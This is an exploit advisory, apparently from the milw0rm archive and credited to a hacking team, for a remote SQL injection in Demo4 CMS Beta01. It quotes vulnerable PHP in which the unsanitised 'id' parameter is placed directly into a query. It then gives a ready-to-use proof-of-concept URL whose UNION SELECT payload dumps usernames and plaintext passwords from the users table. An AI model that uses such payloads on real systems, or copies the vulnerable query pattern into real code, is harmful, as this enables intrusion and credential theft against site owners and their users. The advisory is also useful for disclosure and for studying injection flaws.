=============================================================== Demo4 CMS (index.php id) Remote SQL Injection Vulnerability =============================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 23 June 2008 SITE : www.citec.us ##################################################### APPLICATION : Demo4 CMS VERSION : Beta01 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/demo4 ##################################################### --- Remote SQL Injection --- ----------------------------- Vulnerable File [index.php] ----------------------------- @Line 8: if ($_GET['id']=="") 9: $id = $startpage; 10: else 11: $id = $_GET['id']; 12: database_connect(); 13: $query = "SELECT * from content 14: WHERE id = $id"; 15: $error = mysql_error(); --------- Exploit --------- [+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection] **This exploits can get username and password (No Encryption)** ------------- POC Exploit ------------- [+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-23]